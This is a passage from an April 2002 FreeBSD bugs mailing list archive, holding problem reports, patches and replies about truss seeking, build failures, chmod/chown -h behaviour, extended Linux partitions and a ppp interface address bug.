bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Apr 15, 2002 at 02:10:02PM -0700, Thomas Quinot wrote: > The following patch seems to fix the problem. Addresses on the stack are > beyond 2**31, i.e. a negative long. Changing the offset parameter > to an off_t and using fseeko allows the correct seek to be made. > > addresses on the stack are beyond 2**31, i.e. some negative long value. I wonder would uintptr_t be better than unsigned long in the patch? David. > --- usr.bin/truss/dist/syscalls.c Mon Apr 15 22:44:49 2002 > +++ usr.bin/truss/syscalls.c Mon Apr 15 22:48:18 2002 > @@ -137,7 +137,7 @@ > err(1, "dup"); > if ((p = fdopen(fd, "r")) == NULL) > err(1, "fdopen"); > - fseek(p, (long)offset, SEEK_SET); > + fseeko(p, (unsigned long)offset, SEEK_SET); > for (pos = (char *)buf; len--; pos++) { > if ((c = fgetc(p)) == EOF) > return -1; > @@ -167,7 +167,7 @@ > buf = malloc( size = (max ? max : 64 ) ); > len = 0; > buf[0] = 0; > - fseek(p, (long)offset, SEEK_SET); > + fseeko(p, (unsigned long)offset, SEEK_SET); > while ((c = fgetc(p)) != EOF) { > buf[len++] = c; > if (c == 0 || len == max) { To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 16:40:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D47D437B416 for ; Mon, 15 Apr 2002 16:40:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FNe3892729; Mon, 15 Apr 2002 16:40:03 -0700 (PDT) (envelope-from gnats) Received: from host213-123-130-182.in-addr.btopenworld.com (host213-123-130-182.in-addr.btopenworld.com [213.123.130.182]) by hub.freebsd.org (Postfix) with ESMTP id 3B8E337B405 for ; Mon, 15 Apr 2002 16:38:31 -0700 (PDT) Received: by host213-123-130-182.in-addr.btopenworld.com (Postfix, from userid 1001) id 0244418C; Tue, 16 Apr 2002 00:38:51 +0100 (BST) Message-Id: <20020415233851.0244418C@host213-123-130-182.in-addr.btopenworld.com> Date: Tue, 16 Apr 2002 00:38:51 +0100 (BST) From: Dominic Marks Reply-To: Dominic Marks To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/37117: src/contrib/lukemftpd does not compile Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37117 >Category: bin >Synopsis: src/contrib/lukemftpd does not compile >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Apr 15 16:40:03 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dominic Marks >Release: FreeBSD 5.0-CURRENT i386 >Organization: Student >Environment: FreeBSD oxygen 5.0-CURRENT FreeBSD 5.0-CURRENT #13: Sat Apr 13 23:06:44 BST 2002 dom@oxygen:/usr/obj/mnt/usr/src/sys/OXYGEN i386 >Description: src/contrib/lukemftpd is lacking the libukem/ subdirectory. For this reason it won't build correctly. I've looked and it doesnt appear that the libukem stuff is simply in a different location. Other files may also be missing, however this is the most noticable. >How-To-Repeat: # cd /usr/src/contrib/lukemftpd/ # ./configure # make >Fix: Add the missing files and directories from the vendor. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 18: 0:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BDCE137B400 for ; Mon, 15 Apr 2002 18:00:05 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3G105I10477; Mon, 15 Apr 2002 18:00:05 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 18:00:05 -0700 (PDT) Message-Id: <200204160100.g3G105I10477@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bruce Evans Subject: Re: kern/37063: [PATCH] kernel does not support extended linux partitions Reply-To: Bruce Evans Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/37063; it has been noted by GNATS. From: Bruce Evans To: Aggelos Oikonomopoulos Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/37063: [PATCH] kernel does not support extended linux partitions Date: Tue, 16 Apr 2002 11:00:21 +1000 (EST) On Sun, 14 Apr 2002, Aggelos Oikonomopoulos wrote: > >Description: > The kernel does not handle partitions of type 0x85 (extended linux). > An extended linux partition is the same as an extended DOS partition, except for the entry in the partition table. PRs 19756 and 27269 are also about this. I don't agree with changing the current behaviour. Using extended Linux partitions mainly breaks inter-operability with other OS's, including previous versions of FreeBSD. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 18:50: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 58E9037B400 for ; Mon, 15 Apr 2002 18:50:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3G1o2n21365; Mon, 15 Apr 2002 18:50:02 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 18:50:02 -0700 (PDT) Message-Id: <200204160150.g3G1o2n21365@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: =?iso-8859-7?b?tuPj5evv8iDP6erv7e/s/PDv9evv8g==?= Subject: Re: kern/37063: [PATCH] kernel does not support extended linux partitions Reply-To: =?iso-8859-7?b?tuPj5evv8iDP6erv7e/s/PDv9evv8g==?= Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/37063; it has been noted by GNATS. From: =?iso-8859-7?b?tuPj5evv8iDP6erv7e/s/PDv9evv8g==?= To: Bruce Evans Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/37063: [PATCH] kernel does not support extended linux partitions Date: Tue, 16 Apr 2002 04:40:48 +0300 On Tuesday 16 April 2002 04:00, Bruce Evans wrote: > On Sun, 14 Apr 2002, Aggelos Oikonomopoulos wrote: > > >Description: > > > > The kernel does not handle partitions of type 0x85 (extended linux). > > An extended linux partition is the same as an extended DOS partition, > > except for the entry in the partition table. > > PRs 19756 and 27269 are also about this. Ooops > > I don't agree with changing the current behaviour. Using extended Linux > partitions mainly breaks inter-operability with other OS's, including > previous versions of FreeBSD. But I'm not suggesting people to use 0x85 partitions. I' m merely suggesting that the kernel should provide for people who, for whatever reason (inertia?), are stuck with them. Some people call _this_ interoperability. BTW, to my knowledge, extended linux partitions were used (in place of 0x05) to prevent certain versions of dos fdisk from crashing when it tries to follow beyond cyl 1024, that is, to preserve compatibility. (so for some people, using 0x85 could be a neccessity) > > Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 20: 6:59 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from 12-234-22-238.client.attbi.com (12-234-90-219.client.attbi.com [12.234.90.219]) by hub.freebsd.org (Postfix) with ESMTP id 5B2C237B404; Mon, 15 Apr 2002 20:06:55 -0700 (PDT) Received: from Master.gorean.org (master.gorean.org [10.0.0.2]) by 12-234-22-238.client.attbi.com (8.12.2/8.12.2) with ESMTP id g3G36tHt019606; Mon, 15 Apr 2002 20:06:55 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from Master.gorean.org (zoot [127.0.0.1]) by Master.gorean.org (8.12.2/8.12.2) with ESMTP id g3G36vLr001354; Mon, 15 Apr 2002 20:06:57 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from localhost (doug@localhost) by Master.gorean.org (8.12.2/8.12.2/Submit) with ESMTP id g3G36vce001351; Mon, 15 Apr 2002 20:06:57 -0700 (PDT) X-Authentication-Warning: Master.gorean.org: doug owned process doing -bs Date: Mon, 15 Apr 2002 20:06:57 -0700 (PDT) From: Doug Barton X-X-Sender: doug@master.gorean.org To: FreeBSD bugmaster Cc: FreeBSD bugs list Subject: Re: open PR's (mis)filed to gnats-admin and in limbo In-Reply-To: <200204151800.g3FI09o16431@freefall.freebsd.org> Message-ID: <20020415200650.I723-100000@master.gorean.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Fixed. On Mon, 15 Apr 2002, FreeBSD bugmaster wrote: > Current FreeBSD problem reports > Critical problems > Serious problems > > S Submitted Tracker Resp. Description > ------------------------------------------------------------------------------- > o [2002/04/12] pending/37017gnats-adminRe: textproc/py-asv: remove PYTHON_VERSIO > > 1 problem total. > > Non-critical problems > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-bugs" in the body of the message > > -- "We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States State of the Union, January 28, 2002 Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 20:20:18 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 163F237B404 for ; Mon, 15 Apr 2002 20:20:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3G3K2L41987; Mon, 15 Apr 2002 20:20:02 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 20:20:02 -0700 (PDT) Message-Id: <200204160320.g3G3K2L41987@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Joshua Goodall Subject: Re: bin/36473: Overdue MFC's in chmod/chown/chflags Reply-To: Joshua Goodall Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/36473; it has been noted by GNATS. From: Joshua Goodall To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: bin/36473: Overdue MFC's in chmod/chown/chflags Date: Tue, 16 Apr 2002 13:15:35 +1000 On Fri, Mar 29, 2002 at 01:25:28AM -0800, Joshua Goodall wrote: > The following are now very overdue MFC's: [snip] This is a (tested) diff against -stable: Index: src/bin/chmod/chmod.c =================================================================== RCS file: /cvs/src/bin/chmod/chmod.c,v retrieving revision 1.16.2.3 diff -u -r1.16.2.3 chmod.c --- src/bin/chmod/chmod.c 1 Aug 2001 01:21:09 -0000 1.16.2.3 +++ src/bin/chmod/chmod.c 15 Apr 2002 15:13:10 -0000 @@ -74,11 +74,12 @@ int vflag; char *ep, *mode; int newmode; + int (*change_mode) __P((const char *, mode_t)); set = NULL; omode = 0; Hflag = Lflag = Pflag = Rflag = fflag = hflag = vflag = 0; - while ((ch = getopt(argc, argv, "HLPRXfgorstuvwx")) != -1) + while ((ch = getopt(argc, argv, "HLPRXfghorstuvwx")) != -1) switch (ch) { case 'H': Hflag = 1; @@ -102,9 +103,10 @@ /* * In System V (and probably POSIX.2) the -h option * causes chmod to change the mode of the symbolic - * link. 4.4BSD's symbolic links don't have modes, - * so it's an undocumented noop. Do syntax checking, - * though. + * link. 4.4BSD's symbolic links didn't have modes, + * so it was an undocumented noop. In FreeBSD 3.0, + * lchmod(2) is introduced and this option does real + * work. */ hflag = 1; break; @@ -134,8 +136,8 @@ if (argc < 2) usage(); - fts_options = FTS_PHYSICAL; if (Rflag) { + fts_options = FTS_PHYSICAL; if (hflag) errx(1, "the -R and -h options may not be specified together."); @@ -145,7 +147,13 @@ fts_options &= ~FTS_PHYSICAL; fts_options |= FTS_LOGICAL; } - } + } else + fts_options = hflag ? FTS_PHYSICAL : FTS_LOGICAL; + + if (hflag) + change_mode = lchmod; + else + change_mode = chmod; mode = *argv; if (*mode >= '0' && *mode <= '7') { @@ -189,14 +197,17 @@ * don't point to anything and ones that we found * doing a physical walk. */ - continue; + if (!hflag) + continue; + /* else */ + /* FALLTHROUGH */ default: break; } newmode = oct ? omode : getmode(set, p->fts_statp->st_mode); if ((newmode & ALLPERMS) == (p->fts_statp->st_mode & ALLPERMS)) continue; - if (chmod(p->fts_accpath, newmode) && !fflag) { + if ((*change_mode)(p->fts_accpath, newmode) && !fflag) { warn("%s", p->fts_path); rval = 1; } else { @@ -214,6 +225,6 @@ usage() { (void)fprintf(stderr, - "usage: chmod [-fv] [-R [-H | -L | -P]] mode file ...\n"); + "usage: chmod [-fhv] [-R [-H | -L | -P]] mode file ...\n"); exit(1); } Index: src/usr.bin/chflags/chflags.c =================================================================== RCS file: /cvs/src/usr.bin/chflags/chflags.c,v retrieving revision 1.7.2.3 diff -u -r1.7.2.3 chflags.c --- src/usr.bin/chflags/chflags.c 1 Aug 2001 23:09:18 -0000 1.7.2.3 +++ src/usr.bin/chflags/chflags.c 15 Apr 2002 15:03:40 -0000 @@ -99,15 +99,16 @@ if (argc < 2) usage(); - fts_options = FTS_PHYSICAL; if (Rflag) { + fts_options = FTS_PHYSICAL; if (Hflag) fts_options |= FTS_COMFOLLOW; if (Lflag) { fts_options &= ~FTS_PHYSICAL; fts_options |= FTS_LOGICAL; } - } + } else + fts_options = FTS_LOGICAL; flags = *argv; if (*flags >= '0' && *flags <= '7') { Index: src/usr.sbin/chown/chown.c =================================================================== RCS file: /cvs/src/usr.sbin/chown/chown.c,v retrieving revision 1.15.2.1 diff -u -r1.15.2.1 chown.c --- src/usr.sbin/chown/chown.c 7 Aug 2000 02:03:09 -0000 1.15.2.1 +++ src/usr.sbin/chown/chown.c 15 Apr 2002 15:07:45 -0000 @@ -122,8 +122,8 @@ if (argc < 2) usage(); - fts_options = FTS_PHYSICAL; if (Rflag) { + fts_options = FTS_PHYSICAL; if (hflag && (Lflag || Hflag)) errx(1, "the -R and -h options may not be specified together"); if (Hflag) @@ -132,7 +132,8 @@ fts_options &= ~FTS_PHYSICAL; fts_options |= FTS_LOGICAL; } - } + } else + fts_options = hflag ? FTS_PHYSICAL : FTS_LOGICAL; uid = gid = -1; if (ischown) { To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 21:37: 3 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F35B37B416; Mon, 15 Apr 2002 21:36:52 -0700 (PDT) Received: (from matusita@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3G4ap854408; Mon, 15 Apr 2002 21:36:51 -0700 (PDT) (envelope-from matusita) Date: Mon, 15 Apr 2002 21:36:51 -0700 (PDT) From: Message-Id: <200204160436.g3G4ap854408@freefall.freebsd.org> To: dominic_marks@btinernet.com, matusita@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/37117: src/contrib/lukemftpd does not compile Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: src/contrib/lukemftpd does not compile State-Changed-From-To: open->closed State-Changed-By: matusita State-Changed-When: Mon Apr 15 21:34:40 PDT 2002 State-Changed-Why: Use src/libexec/lukemftpd if you want to build lukemftpd. http://www.freebsd.org/cgi/query-pr.cgi?pr=37117 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 22: 0:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9D9BA37B405 for ; Mon, 15 Apr 2002 22:00:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3G503157540; Mon, 15 Apr 2002 22:00:03 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6E26037B404 for ; Mon, 15 Apr 2002 21:54:28 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3G4sSE56822; Mon, 15 Apr 2002 21:54:28 -0700 (PDT) (envelope-from nobody) Message-Id: <200204160454.g3G4sSE56822@freefall.freebsd.org> Date: Mon, 15 Apr 2002 21:54:28 -0700 (PDT) From: Peter Marrinon To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/37127: make in /sys/boot/i386/boot2 and in /sys/boot/i386/loader fail Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37127 >Category: kern >Synopsis: make in /sys/boot/i386/boot2 and in /sys/boot/i386/loader fail >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Apr 15 22:00:03 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Peter Marrinon >Release: 4.5 >Organization: Telstra Internet Development >Environment: FreeBSD tmp5.telstra.net 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Thu Apr 11 16:34:47 GMT 2002 root@tmp.telstra.net:/usr/src/sys/compile/BOOTDISK i386 >Description: When following 15.6.4.2 in the handbook, running make in /sys/boot/i386/boot2 and /sys/boot/i386/loader have errors. > cd /sys/boot/i386/boot2 > make SNIP /usr/libexec/elf/ld: cannot open /usr/src/sys/boot/i386/boot2/../btx/lib/crt0.o: No such file or directory *** Error code 1 AFTER FIXING ABOVE > make SNIP make: don't know how to make /usr/src/sys/boot/i386/boot2/../btx/btx/btx AFTER RUNNING make IN ../btx/btx IT WORKS >How-To-Repeat: Follow the instruction given in section 15.6.4.2 of the handbook. >Fix: WORKAROUND: It is possible to get around the problem by going to the relevant directories and making the missing files as outlined above. FIX: Change the Makefile to have correct dependencies and/or change documentation to run a higher level make before running these commands >Release-Note: >Audit-Trail: >Unformatted: >cd /sys/boot/i386/loader >make SNIP cc: /usr/src/sys/boot/i386/loader/../../ficl/libficl.a: No such file or directory cc: /usr/src/sys/boot/i386/loader/../libi386/libi386.a: No such file or directory AFTER RUNNING MAKE IN RELEVANT DIRECTORIES... >make SNIP make: don't know how to make /usr/src/sys/boot/i386/loader/../btx/btxldr/btxldr. AFTER RUNNING make in ../btx/btxldr IT WORKS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Apr 16 2:17:28 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from melchior.cuivre.fr.eu.org (melchior.enst.fr [137.194.161.6]) by hub.freebsd.org (Postfix) with ESMTP id B7DAB37B400 for ; Tue, 16 Apr 2002 02:17:25 -0700 (PDT) Received: from melusine.cuivre.fr.eu.org (melusine.enst.fr [137.194.160.34]) by melchior.cuivre.fr.eu.org (Postfix) with ESMTP id 8C2838031; Tue, 16 Apr 2002 11:17:19 +0200 (CEST) Received: by melusine.cuivre.fr.eu.org (Postfix, from userid 1000) id 0FC122C3D1; Tue, 16 Apr 2002 11:17:18 +0200 (CEST) Date: Tue, 16 Apr 2002 11:17:18 +0200 From: Thomas Quinot To: David Malone Cc: Thomas Quinot , freebsd-bugs@FreeBSD.org Subject: Re: bin/37104 [PATCH] Message-ID: <20020416111717.A86765@melusine.cuivre.fr.eu.org> Reply-To: thomas@cuivre.fr.eu.org References: <200204152110.g3FLA2M65236@freefall.freebsd.org> <20020415222419.GA46761@lanczos.maths.tcd.ie> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <20020415222419.GA46761@lanczos.maths.tcd.ie>; from dwmalone@maths.tcd.ie on Mon, Apr 15, 2002 at 11:24:19PM +0100 X-message-flag: WARNING! Using Outlook can damage your computer. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Le 2002-04-16, David Malone écrivait : > > addresses on the stack are beyond 2**31, i.e. some negative long value. > I wonder would uintptr_t be better than unsigned long in the patch? Hum, right. It would be more appropriate, and fixes the problem as well. Thomas. -- Thomas.Quinot@Cuivre.FR.EU.ORG To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Apr 16 3: 7:21 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from hotmail.com (f217.pav2.hotmail.com [64.4.37.217]) by hub.freebsd.org (Postfix) with ESMTP id 985FF37B400 for ; Tue, 16 Apr 2002 03:07:19 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 16 Apr 2002 03:07:19 -0700 Received: from 195.154.160.10 by pv2fd.pav2.hotmail.msn.com with HTTP; Tue, 16 Apr 2002 10:07:19 GMT X-Originating-IP: [195.154.160.10] From: "Maxime Mathon" To: freebsd-bugs@FreeBSD.org Subject: Problem Report kern/30135 Date: Tue, 16 Apr 2002 12:07:19 +0200 Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1; format=flowed Message-ID: X-OriginalArrivalTime: 16 Apr 2002 10:07:19.0585 (UTC) FILETIME=[7E73A910:01C1E52E] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Time drifting on STABLE SMP when calling gettimeofday(). Hey, do you any further informations about this problem !!! THX a lot _________________________________________________________________ Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Apr 16 3:30:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 16A5C37B416 for ; Tue, 16 Apr 2002 03:30:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GAU4e35401; Tue, 16 Apr 2002 03:30:04 -0700 (PDT) (envelope-from gnats) Date: Tue, 16 Apr 2002 03:30:04 -0700 (PDT) Message-Id: <200204161030.g3GAU4e35401@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Pentchev Subject: Re: kern/37109: Kernel refuses to assign unused IP to tun via ppp after some time Reply-To: Peter Pentchev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/37109; it has been noted by GNATS. From: Peter Pentchev To: Brian Curnow Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: kern/37109: Kernel refuses to assign unused IP to tun via ppp after some time Date: Tue, 16 Apr 2002 13:29:09 +0300 On Mon, Apr 15, 2002 at 12:12:12PM -0700, Brian Curnow wrote: > > >Number: 37109 > >Category: kern > >Synopsis: Kernel refuses to assign unused IP to tun via ppp after some time > >Originator: Brian Curnow > Using pptpd, ppp. Appears to be a kernel bug which believes that > certain IPs, after having previously been used on interface, are still > in use and refuses to allow ppp to assign them. Given enough time, > this will cause even large ranges of IP to be unusable until reboot. > > I believe this is a kernel bug because my look at the ppp code seemed > to be that ppp does not keep any state on IP or interface use, and > tries range until the kernel accepts one that is offered. > > System is SMP. > > ppp.log errors: > Error: iface_inAdd: ioctl(SIOCAIFADDR): 10.0.0.3: File exists > Error: ipcp_InterfaceUp: unable to set ip address > Warning: iface_addr_Zap: ioctl(SIOCDIFADDR, 10.0.0.3): Can't assign requested address > > IN this case, 10.0.0.3 is the local IP side, and the actual IP that can't be > assigned is the peer IP of 10.0.0.61. In this case, changing the peer IP > in /etc/ppp/ppp.secret allowed the connection to proceed. Over time, > all IPs will become unusable. > >How-To-Repeat: > running ppp via tun interface to pptpd seems to cause problem over time. > Perhaps a race condition? > >Fix: > Unknown. Cure by reboot. FWIW, I had this happen recently on a server which has five incoming PPP-over-TCP connections up most of the time. After some flakiness on the part of the network connection, one of those interfaces started whining in the exact same way. A buildworld/buildkernel/installkernel/installworld/reboot cured it; it has not happened in the last six days. I am not sure that it is gone for good; if it should happen again, I will be happy to provide any diagnostics that people request beforehand; unfortunately, it is very likely that the box will have to be rebooted to cure the problem again very soon after this happens, or some customers will be slightly irritated :) G'luck, Peter -- Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 .siht ekil ti gnidaer eb d'uoy ,werbeH ni erew ecnetnes siht fI To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Apr 16 4: 3:56 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B914C37B400; Tue, 16 Apr 2002 04:03:53 -0700 (PDT) Received: (from joe@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GB3r544778; Tue, 16 Apr 2002 04:03:53 -0700 (PDT) (envelope-from joe) Date: Tue, 16 Apr 2002 04:03:53 -0700 (PDT) From: Message-Id: <200204161103.g3GB3r544778@freefall.freebsd.org> To: joshua@roughtrade.net, joe@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/37038: fflagstostr and strtofflags don't recognise snapshots Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: fflagstostr and strtofflags don't recognise snapshots State-Changed-From-To: open->closed State-Changed-By: joe State-Changed-When: Tue Apr 16 04:03:42 PDT 2002 State-Changed-Why: Committed, thanks. http://www.freebsd.org/cgi/query-pr.cgi?pr=37038 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Apr 16 4:10: 6 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C081437B416 for ; Tue, 16 Apr 2002 04:10:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GBA1w49525; Tue, 16 Apr 2002 04:10:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 35B7637B400 for ; Tue, 16 Apr 2002 04:03:51 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GB3pq44768; Tue, 16 Apr 2002 04:03:51 -0700 (PDT) (envelope-from nobody) Message-Id: <200204161103.g3GB3pq44768@freefall.freebsd.org> Date: Tue, 16 Apr 2002 04:03:51 -0700 (PDT) From: Alexander Kaasjager To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/37135: Problems when installing FreeBSD + Gnome/Sawfish from CD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37135 >Category: i386 >Synopsis: Problems when installing FreeBSD + Gnome/Sawfish from CD >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Apr 16 04:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Alexander Kaasjager >Release: 4.4 and 4.5-RC3 >Organization: NA >Environment: misc i386 environments >Description: When installing FreeBSD from CD, and opting for the 'Gnome + Sawfish' xfree86 install, the setup will run and copy files for considerable time, then quits with the message that 'Sawfish could not be found on the CD' >How-To-Repeat: Run /stand/sysinstall and choose xfree86 setup with Gnome and Sawfish >Fix: Include sawfish binaries + source, check dependencies >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in 